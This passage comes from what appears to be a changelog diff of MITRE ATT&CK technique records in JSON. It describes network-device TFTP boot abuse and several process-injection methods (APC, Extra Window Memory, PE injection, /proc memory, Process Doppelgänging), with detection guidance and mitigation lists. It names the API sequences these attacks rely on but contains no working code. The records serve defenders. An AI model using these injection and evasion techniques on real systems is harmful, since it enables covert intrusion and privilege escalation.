If a network device is suspected of being compromised, contact the vendor to assist in further investigation.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Network Devices" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:47:36.549000+00:00\", \"old_value\": \"2025-04-15 19:58:55.910000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1031: Network Intrusion Prevention", + "M1046: Boot Integrity", + "M1047: Audit" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0001: Firmware (Firmware Modification)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--28abec6c-4443-4b03-8206-07f2e264a6b4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-10-20 00:06:56.180000+00:00", + "modified": "2025-04-25 14:46:08.824000+00:00", + "name": "TFTP Boot", + "description": "Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.\n\nAdversaries may manipulate the configuration on the network device specifying use of a malicious TFTP server, which may be used in conjunction with [Modify System Image](https://attack.mitre.org/techniques/T1601) to load a modified image on device startup or reset. 
The unauthorized image allows adversaries to modify device configuration, add malicious capabilities to the device, and introduce backdoors to maintain control of the network device while minimizing detection through use of a standard functionality. This technique is similar to [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) and may result in the network device running a modified image. (Citation: Cisco Blog Legacy Device Attacks)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1542/005", + "external_id": "T1542.005" + }, + { + "source_name": "Cisco Blog Legacy Device Attacks", + "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.", + "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954" + }, + { + "source_name": "Cisco IOS Software Integrity Assurance - Secure Boot", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Secure Boot. Retrieved October 19, 2020.", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#35" + }, + { + "source_name": "Cisco IOS Software Integrity Assurance - Image File Verification", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Image File Verification. Retrieved October 19, 2020.", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#7" + }, + { + "source_name": "Cisco IOS Software Integrity Assurance - Run-Time Memory Verification", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Run-Time Memory Integrity Verification. 
Retrieved October 19, 2020.", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#13" + }, + { + "source_name": "Cisco IOS Software Integrity Assurance - Command History", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Command History. Retrieved October 21, 2020.", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#23" + }, + { + "source_name": "Cisco IOS Software Integrity Assurance - Boot Information", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot Information. Retrieved October 21, 2020.", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#26" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Command: Command Execution", + "Network Traffic: Network Connection Creation", + "Firmware: Firmware Modification" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Consider comparing a copy of the network device configuration and system image against a known-good version to discover unauthorized changes to system boot, startup configuration, or the running OS. (Citation: Cisco IOS Software Integrity Assurance - Secure Boot) (Citation: Cisco IOS Software Integrity Assurance - Image File Verification)The same process can be accomplished through a comparison of the run-time memory, though this is non-trivial and may require assistance from the vendor. (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)\n\nReview command history in either the console or as part of the running memory to determine if unauthorized or suspicious commands were used to modify device configuration. 
(Citation: Cisco IOS Software Integrity Assurance - Command History) Check boot information including system uptime, image booted, and startup configuration to determine if results are consistent with expected behavior in the environment. (Citation: Cisco IOS Software Integrity Assurance - Boot Information) Monitor unusual connections or connection attempts to the device that may specifically target TFTP or other file-sharing protocols.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Network Devices" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:46:08.824000+00:00\", \"old_value\": \"2025-04-15 19:58:15.890000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1026: Privileged Account Management", + "M1028: Operating System Configuration", + "M1031: Network Intrusion Prevention", + "M1035: Limit Access to Resource Over Network", + "M1046: Boot Integrity", + "M1047: Audit" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0001: Firmware (Firmware Modification)", + "DS0017: Command (Command Execution)", + "DS0029: Network Traffic (Network Connection Creation)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--7c0f17c9-1af6-4628-9cbd-9e45482dd605", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-01-14 01:29:43.786000+00:00", + "modified": "2025-04-25 14:47:11.435000+00:00", + "name": "Asynchronous Procedure Call", + "description": "Adversaries may inject malicious code into processes via the asynchronous procedure call (APC) queue in order to evade process-based defenses as well as possibly elevate privileges. 
APC injection is a method of executing arbitrary code in the address space of a separate live process. \n\nAPC injection is commonly performed by attaching malicious code to the APC Queue (Citation: Microsoft APC) of a process's thread. Queued APC functions are executed when the thread enters an alterable state.(Citation: Microsoft APC) A handle to an existing victim process is first created with native Windows API calls such as OpenThread. At this point QueueUserAPC can be used to invoke a function (such as LoadLibrayA pointing to a malicious DLL). \n\nA variation of APC injection, dubbed \"Early Bird injection\", involves creating a suspended process in which malicious code can be written and executed before the process' entry point (and potentially subsequent anti-malware hooks) via an APC. (Citation: CyberBit Early Bird Apr 2018) AtomBombing (Citation: ENSIL AtomBombing Oct 2016) is another variation that utilizes APCs to invoke malicious code previously written to the global atom table.(Citation: Microsoft Atom Table)\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via APC injection may also evade detection from security products since the execution is masked under a legitimate process. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1055/004", + "external_id": "T1055.004" + }, + { + "source_name": "Microsoft APC", + "description": "Microsoft. (n.d.). Asynchronous Procedure Calls. Retrieved December 8, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/ms681951.aspx" + }, + { + "source_name": "CyberBit Early Bird Apr 2018", + "description": "Gavriel, H. 
& Erbesfeld, B. (2018, April 11). New \u2018Early Bird\u2019 Code Injection Technique Discovered. Retrieved May 24, 2018.", + "url": "https://www.cyberbit.com/blog/endpoint-security/new-early-bird-code-injection-technique-discovered/" + }, + { + "source_name": "ENSIL AtomBombing Oct 2016", + "description": "Liberman, T. (2016, October 27). ATOMBOMBING: BRAND NEW CODE INJECTION FOR WINDOWS. Retrieved December 8, 2017.", + "url": "https://blog.ensilo.com/atombombing-brand-new-code-injection-for-windows" + }, + { + "source_name": "Microsoft Atom Table", + "description": "Microsoft. (n.d.). About Atom Tables. Retrieved December 8, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/ms649053.aspx" + }, + { + "source_name": "Elastic Process Injection July 2017", + "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.", + "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Process: OS API Execution", + "Process: Process Access", + "Process: Process Modification" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. 
Windows API calls such as SuspendThread/SetThreadContext/ResumeThread, QueueUserAPC/NtQueueApcThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:47:11.435000+00:00\", \"old_value\": \"2025-04-15 19:58:44.390000+00:00\"}}}", + "previous_version": "1.2", + "changelog_mitigations": { + "shared": [ + "M1040: Behavior Prevention on Endpoint" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (OS API Execution)", + "DS0009: Process (Process Access)", + "DS0009: Process (Process Modification)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--0042a9f5-f053-4769-b3ef-9ad018dfa298", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-01-14 17:18:32.126000+00:00", + "modified": "2025-04-25 14:45:37.275000+00:00", + "name": "Extra Window Memory Injection", + "description": "Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process. 
\n\nBefore creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data).(Citation: Microsoft Window Classes) Registration of new windows classes can include a request for up to 40 bytes of EWM to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value. (Citation: Microsoft GetWindowLong function) (Citation: Microsoft SetWindowLong function)\n\nAlthough small, the EWM is large enough to store a 32-bit pointer and is often used to point to a windows procedure. Malware may possibly utilize this memory location in part of an attack chain that includes writing code to shared sections of the process\u2019s memory, placing a pointer to the code in EWM, then invoking execution by returning execution control to the address in the process\u2019s EWM.\n\nExecution granted through EWM injection may allow access to both the target process's memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as WriteProcessMemory and CreateRemoteThread.(Citation: Elastic Process Injection July 2017) More sophisticated malware samples may also potentially bypass protection mechanisms such as data execution prevention (DEP) by triggering a combination of windows procedures and other system functions that will rewrite the malicious payload inside an executable portion of the target process. (Citation: MalwareTech Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. 
Execution via EWM injection may also evade detection from security products since the execution is masked under a legitimate process. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1055/011", + "external_id": "T1055.011" + }, + { + "source_name": "Microsoft Window Classes", + "description": "Microsoft. (n.d.). About Window Classes. Retrieved December 16, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/ms633574.aspx" + }, + { + "source_name": "Microsoft GetWindowLong function", + "description": "Microsoft. (n.d.). GetWindowLong function. Retrieved December 16, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/ms633584.aspx" + }, + { + "source_name": "Microsoft SetWindowLong function", + "description": "Microsoft. (n.d.). SetWindowLong function. Retrieved December 16, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/ms633591.aspx" + }, + { + "source_name": "Elastic Process Injection July 2017", + "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.", + "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" + }, + { + "source_name": "MalwareTech Power Loader Aug 2013", + "description": "MalwareTech. (2013, August 13). PowerLoader Injection \u2013 Something truly amazing. Retrieved December 16, 2017.", + "url": "https://www.malwaretech.com/2013/08/powerloader-injection-something-truly.html" + }, + { + "source_name": "WeLiveSecurity Gapz and Redyms Mar 2013", + "description": "Matrosov, A. (2013, March 19). 
Gapz and Redyms droppers based on Power Loader code. Retrieved December 16, 2017.", + "url": "https://www.welivesecurity.com/2013/03/19/gapz-and-redyms-droppers-based-on-power-loader-code/" + }, + { + "source_name": "Microsoft SendNotifyMessage function", + "description": "Microsoft. (n.d.). SendNotifyMessage function. Retrieved December 16, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/ms644953.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Process: OS API Execution" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for API calls related to enumerating and manipulating EWM such as GetWindowLong (Citation: Microsoft GetWindowLong function) and SetWindowLong (Citation: Microsoft SetWindowLong function). Malware associated with this technique have also used SendNotifyMessage (Citation: Microsoft SendNotifyMessage function) to trigger the associated window procedure and eventual malicious injection. 
(Citation: Elastic Process Injection July 2017)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:37.275000+00:00\", \"old_value\": \"2025-04-15 19:58:00.917000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1040: Behavior Prevention on Endpoint" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (OS API Execution)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--806a49c4-970d-43f9-9acc-ac0ee11e6662", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-01-14 01:27:31.344000+00:00", + "modified": "2025-04-25 14:47:15.984000+00:00", + "name": "Portable Executable Injection", + "description": "Adversaries may inject portable executables (PE) into processes in order to evade process-based defenses as well as possibly elevate privileges. PE injection is a method of executing arbitrary code in the address space of a separate live process. \n\nPE injection is commonly performed by copying code (perhaps without a file on disk) into the virtual address space of the target process before invoking it via a new thread. The write can be performed with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread or additional code (ex: shellcode). The displacement of the injected code does introduce the additional requirement for functionality to remap memory references. 
(Citation: Elastic Process Injection July 2017) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via PE injection may also evade detection from security products since the execution is masked under a legitimate process. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1055/002", + "external_id": "T1055.002" + }, + { + "source_name": "Elastic Process Injection July 2017", + "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.", + "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Process: Process Access", + "Process: OS API Execution", + "Process: Process Modification" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. 
Windows API calls such as CreateRemoteThread and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:47:15.984000+00:00\", \"old_value\": \"2025-04-15 19:58:46.232000+00:00\"}}}", + "previous_version": "1.2", + "changelog_mitigations": { + "shared": [ + "M1040: Behavior Prevention on Endpoint" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (OS API Execution)", + "DS0009: Process (Process Access)", + "DS0009: Process (Process Modification)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--d201d4cc-214d-4a74-a1ba-b3fa09fd4591", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-01-14 01:34:10.588000+00:00", + "modified": "2025-04-25 14:48:08.263000+00:00", + "name": "Proc Memory", + "description": "Adversaries may inject malicious code into processes via the /proc filesystem in order to evade process-based defenses as well as possibly elevate privileges. Proc memory injection is a method of executing arbitrary code in the address space of a separate live process. 
\n\nProc memory injection involves enumerating the memory of a process via the /proc filesystem (/proc/[pid]) then crafting a return-oriented programming (ROP) payload with available gadgets/instructions. Each running process has its own directory, which includes memory mappings. Proc memory injection is commonly performed by overwriting the target processes\u2019 stack using memory mappings provided by the /proc filesystem. This information can be used to enumerate offsets (including the stack) and gadgets (or instructions within the program that can be used to build a malicious payload) otherwise hidden by process memory protections such as address space layout randomization (ASLR). Once enumerated, the target processes\u2019 memory map within /proc/[pid]/maps can be overwritten using dd.(Citation: Uninformed Needle)(Citation: GDS Linux Injection)(Citation: DD Man) \n\nOther techniques such as [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) may be used to populate a target process with more available gadgets. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), proc memory injection may target child processes (such as a backgrounded copy of sleep).(Citation: GDS Linux Injection) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via proc memory injection may also evade detection from security products since the execution is masked under a legitimate process. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1055/009", + "external_id": "T1055.009" + }, + { + "source_name": "Uninformed Needle", + "description": "skape. 
(2003, January 19). Linux x86 run-time process manipulation. Retrieved December 20, 2017.", + "url": "http://hick.org/code/skape/papers/needle.txt" + }, + { + "source_name": "GDS Linux Injection", + "description": "McNamara, R. (2017, September 5). Linux Based Inter-Process Code Injection Without Ptrace(2). Retrieved February 21, 2020.", + "url": "https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.html" + }, + { + "source_name": "DD Man", + "description": "Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved February 21, 2020.", + "url": "http://man7.org/linux/man-pages/man1/dd.1.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "File: File Modification" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "File system monitoring can determine if /proc files are being modified. Users should not have permission to modify these in most cases. \n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. 
", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:48:08.263000+00:00\", \"old_value\": \"2025-04-15 19:59:10.291000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1022: Restrict File and Directory Permissions", + "M1040: Behavior Prevention on Endpoint" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0022: File (File Modification)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--7007935a-a8a7-4c0b-bd98-4e85be8ed197", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-01-14 17:19:50.978000+00:00", + "modified": "2025-04-25 14:47:03.621000+00:00", + "name": "Process Doppelg\u00e4nging", + "description": "Adversaries may inject malicious code into process via process doppelg\u00e4nging in order to evade process-based defenses as well as possibly elevate privileges. Process doppelg\u00e4nging is a method of executing arbitrary code in the address space of a separate live process. \n\nWindows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations. (Citation: Microsoft TxF) To ensure data integrity, TxF enables only one transacted handle to write to a file at a given time. Until the write handle transaction is terminated, all other handles are isolated from the writer and may only read the committed version of the file that existed at the time the handle was opened. (Citation: Microsoft Basic TxF Concepts) To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction. 
(Citation: Microsoft Where to use TxF)\n\nAlthough deprecated, the TxF application programming interface (API) is still enabled as of Windows 10. (Citation: BlackHat Process Doppelg\u00e4nging Dec 2017)\n\nAdversaries may abuse TxF to a perform a file-less variation of [Process Injection](https://attack.mitre.org/techniques/T1055). Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), process doppelg\u00e4nging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process doppelg\u00e4nging's use of TxF also avoids the use of highly-monitored API functions such as NtUnmapViewOfSection, VirtualProtectEx, and SetThreadContext. (Citation: BlackHat Process Doppelg\u00e4nging Dec 2017)\n\nProcess Doppelg\u00e4nging is implemented in 4 steps (Citation: BlackHat Process Doppelg\u00e4nging Dec 2017):\n\n* Transact \u2013 Create a TxF transaction using a legitimate executable then overwrite the file with malicious code. These changes will be isolated and only visible within the context of the transaction.\n* Load \u2013 Create a shared section of memory and load the malicious executable.\n* Rollback \u2013 Undo changes to original executable, effectively removing malicious code from the file system.\n* Animate \u2013 Create a process from the tainted section of memory and initiate execution.\n\nThis behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process doppelg\u00e4nging may evade detection from security products since the execution is masked under a legitimate process. 
", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1055/013", + "external_id": "T1055.013" + }, + { + "source_name": "Microsoft TxF", + "description": "Microsoft. (n.d.). Transactional NTFS (TxF). Retrieved December 20, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/bb968806.aspx" + }, + { + "source_name": "Microsoft Basic TxF Concepts", + "description": "Microsoft. (n.d.). Basic TxF Concepts. Retrieved December 20, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/dd979526.aspx" + }, + { + "source_name": "Microsoft Where to use TxF", + "description": "Microsoft. (n.d.). When to Use Transactional NTFS. Retrieved December 20, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/aa365738.aspx" + }, + { + "source_name": "BlackHat Process Doppelg\u00e4nging Dec 2017", + "description": "Liberman, T. & Kogan, E. (2017, December 7). Lost in Transaction: Process Doppelg\u00e4nging. Retrieved December 20, 2017.", + "url": "https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf" + }, + { + "source_name": "hasherezade Process Doppelg\u00e4nging Dec 2017", + "description": "hasherezade. (2017, December 18). Process Doppelg\u00e4nging \u2013 a new way to impersonate a process. Retrieved December 20, 2017.", + "url": "https://hshrzd.wordpress.com/2017/12/18/process-doppelganging-a-new-way-to-impersonate-a-process/" + }, + { + "source_name": "Microsoft PsSetCreateProcessNotifyRoutine routine", + "description": "Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. 
Retrieved December 20, 2017.", + "url": "https://msdn.microsoft.com/library/windows/hardware/ff559951.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "File: File Metadata", + "Process: OS API Execution" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor and analyze calls to CreateTransaction, CreateFileTransacted, RollbackTransaction, and other rarely used functions indicative of TxF activity. Process Doppelg\u00e4nging also invokes an outdated and undocumented implementation of the Windows process loader via calls to NtCreateProcessEx and NtCreateThreadEx as well as API calls used to modify memory within another process, such as WriteProcessMemory. (Citation: BlackHat Process Doppelg\u00e4nging Dec 2017) (Citation: hasherezade Process Doppelg\u00e4nging Dec 2017)\n\nScan file objects reported during the PsSetCreateProcessNotifyRoutine, (Citation: Microsoft PsSetCreateProcessNotifyRoutine routine) which triggers a callback whenever a process is created or deleted, specifically looking for file objects with enabled write access. (Citation: BlackHat Process Doppelg\u00e4nging Dec 2017) Also consider comparing file objects loaded in memory to the corresponding file on disk. 
(Citation: hasherezade Process Doppelg\u00e4nging Dec 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:47:03.621000+00:00\", \"old_value\": \"2025-04-15 19:58:40.683000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1040: Behavior Prevention on Endpoint" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (OS API Execution)", + "DS0022: File (File Metadata)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--ea016b56-ae0e-47fe-967a-cc0ad51af67f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-01-14 01:33:19.065000+00:00", + "modified": "2025-04-25 14:48:25.896000+00:00", + "name": "Ptrace System Calls", + "description": "Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges. Ptrace system call injection is a method of executing arbitrary code in the address space of a separate live process. \n\nPtrace system call injection involves attaching to and modifying a running process. 
